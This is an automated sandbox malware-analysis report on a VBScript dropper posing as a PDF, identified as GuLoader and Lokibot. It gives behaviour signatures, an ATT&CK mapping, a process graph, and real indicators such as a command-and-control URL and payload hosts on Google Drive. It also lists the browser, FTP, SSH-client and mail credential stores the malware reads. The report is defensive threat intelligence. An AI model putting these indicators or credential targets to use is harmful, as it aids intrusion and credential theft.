                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1900, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                221
                Scripting
                1
                DLL Side-Loading
                2
                Obfuscated Files or Information
                2
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution
                1
                DLL Side-Loading
                111
                Process Injection
                1
                Software Packing
                1
                Credentials in Registry
                114
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)1
                Timestomp
                Security Account Manager111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture14
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                Process Injection
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523162 Sample: Aj#U00e1nlatk#U00e9r#U00e9s... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 30 18.31.95.13.in-addr.arpa 2->30 32 drive.usercontent.google.com 2->32 34 drive.google.com 2->34 44 Multi AV Scanner detection for domain / URL 2->44 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 6 other signatures 2->50 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 52 Writes to foreign memory regions 8->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 8->54 13 dxdiag.exe 1 89 8->13         started        18 dxdiag.exe 8->18         started        20 conhost.exe 8->20         started        24 12 other processes 8->24 56 VBScript performs obfuscated calls to suspicious functions 11->56 58 Suspicious powershell command line found 11->58 60 Wscript starts Powershell (via cmd or directly) 11->60 62 2 other signatures 11->62 22 powershell.exe 14 18 11->22         started        process6 dnsIp7 36 137.184.191.215, 65313, 65314, 65315 PANDGUS United States 13->36 38 216.58.206.46, 443, 65310 GOOGLEUS United States 13->38 28 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 13->28 dropped 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->64 66 Tries to steal Mail credentials (via file / registry access) 13->66 68 Tries to harvest and steal ftp login credentials 13->68 70 Tries to harvest and steal browser information (history, passwords, etc) 13->70 72 Switches to a custom stack to bypass stack traces 18->72 40 drive.usercontent.google.com 142.250.184.193, 443, 49706, 65312 GOOGLEUS United States 22->40 42 drive.google.com 142.250.186.46, 443, 49705 GOOGLEUS United States 22->42 74 Found suspicious powershell code related to unpacking or dynamic code loading 22->74 26 conhost.exe 22->26         started        file8 signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs11%ReversingLabsScript.Trojan.Heuristic
                Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs5%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                drive.google.com0%VirustotalBrowse
                drive.usercontent.google.com1%VirustotalBrowse
                18.31.95.13.in-addr.arpa0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://crl.microsoft0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://wordpress.org/documentation/article/faq-troubleshooting/0%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse
                https://drive.usercontent.google.com/1%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://drive.google.com/0%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                http://drive.usercontent.google.com1%VirustotalBrowse
                http://137.184.191.215/index.php/1089910%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                142.250.186.46
                truefalseunknown
                drive.usercontent.google.com
                142.250.184.193
                truefalseunknown
                18.31.95.13.in-addr.arpa
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/10899trueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B22A8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://crl.microsoftpowershell.exe, 00000004.00000002.3052757147.00000000076E6000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                https://go.micropowershell.exe, 00000002.00000002.2192650353.000001F3B10CE000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://drive.googPzpowershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://wordpress.org/documentation/article/faq-troubleshooting/dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.google.com/dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://drive.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://drive.usercontent.google.com/s.cndxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://drive.usercontent.google.com/Sdxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://drive.usercontent.googhhpowershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.google.com/dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B092B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://apis.google.compowershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.usercontent.google.com/earc%(dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          142.250.186.46
                          drive.google.comUnited States
                          15169GOOGLEUSfalse
                          142.250.184.193
                          drive.usercontent.google.comUnited States
                          15169GOOGLEUSfalse
                          137.184.191.215
                          unknownUnited States
                          11003PANDGUStrue
                          216.58.206.46
                          unknownUnited States
                          15169GOOGLEUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1523162
                          Start date and time:2024-10-01 07:48:38 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 51s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs
                          renamed because original name is a hash value
                          Original Sample Name:Ajnlatkrs 09-30-2024pdf.vbs
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winVBS@34/10@5/4
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 81%
                          • Number of executed functions: 64
                          • Number of non-executed functions: 18
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 1292 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          TimeTypeDescription
                          01:49:34API Interceptor83x Sleep call for process: powershell.exe modified
                          01:50:24API Interceptor27x Sleep call for process: dxdiag.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          137.184.191.215PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/check.php?id=1
                          Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/10899
                          SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/check.php?s=am9ntjjw
                          Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/039
                          PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/check.php?s=am9ntjjw
                          Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/check.php?s=am9ntjjw
                          B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/10899
                          ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/039
                          DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/10899
                          INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215/index.php/check.php?s=am9ntjjw
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          PANDGUSPRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                          • 155.120.253.229
                          PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 137.184.191.215
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0e18000012550_20240930_0078864246#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          A 413736796#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          Scanned Purchase List.vbsGet hashmaliciousUnknownBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                          • 142.250.186.46
                          • 142.250.184.193
                          37f463bf4616ecd445d4a1937da06e1918000012550_20240930_0078864246#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          A 413736796#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                          • 142.250.184.193
                          • 216.58.206.46
                          N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
